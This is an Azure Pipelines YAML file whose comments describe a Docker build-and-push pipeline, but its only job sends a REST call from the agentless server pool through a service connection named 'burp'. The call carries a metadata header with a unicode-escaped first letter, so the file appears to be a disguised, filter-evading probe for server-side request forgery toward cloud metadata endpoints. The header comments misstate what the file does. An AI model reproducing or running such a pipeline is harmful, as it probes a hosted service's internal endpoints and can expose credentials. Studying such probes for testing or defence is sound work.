# Docker
# Build and push an image to Azure Container Registry
# https://docs.microsoft.com/azure/devops/pipelines/languages/docker

trigger:
- main

resources:
- repo: self

jobs:
- job: RunRESTAPI
  pool: server
  steps:
  - task: InvokeRESTAPI@1
    inputs:
      connectionType: 'connectedServiceName'
      serviceConnection: 'burp'
      method: 'GET'
      headers: |
        {
        "\u004dmetadata":"true"
        }
      waitForCompletion: 'false'